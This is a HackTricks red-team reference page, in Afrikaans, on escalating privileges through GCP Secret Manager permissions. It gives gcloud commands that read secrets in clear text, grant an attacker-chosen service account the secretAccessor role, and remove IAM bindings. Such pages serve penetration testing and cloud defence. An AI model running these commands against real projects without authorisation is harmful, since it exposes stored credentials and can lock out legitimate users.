GCP - Secretmanager Privesc

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

secretmanager

Vir meer inligting oor secretmanager:

GCP - Secrets Manager Enum

secretmanager.versions.access

Dit gee jou toegang om die secrets van die secret manager te lees en kan dalk help om escalate privileges (afhangend van watter inligting in die secret stored is):

Kry clear-text secret version ```bash # Get clear-text of version 1 of secret: "" gcloud secrets versions access 1 --secret="" ```

Aangesien dit ook ’n post exploitation technique is, kan dit gevind word in:

GCP - Secretmanager Post Exploitation

secretmanager.secrets.setIamPolicy

Dit gee jou toegang om die secrets uit die secret manager te lees, byvoorbeeld deur:

Add IAM policy binding to secret ```bash gcloud secrets add-iam-policy-binding \ --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ``` Of herroep beleide met: ```bash gcloud secrets remove-iam-policy-binding \ --member="serviceAccount:@.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ```

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks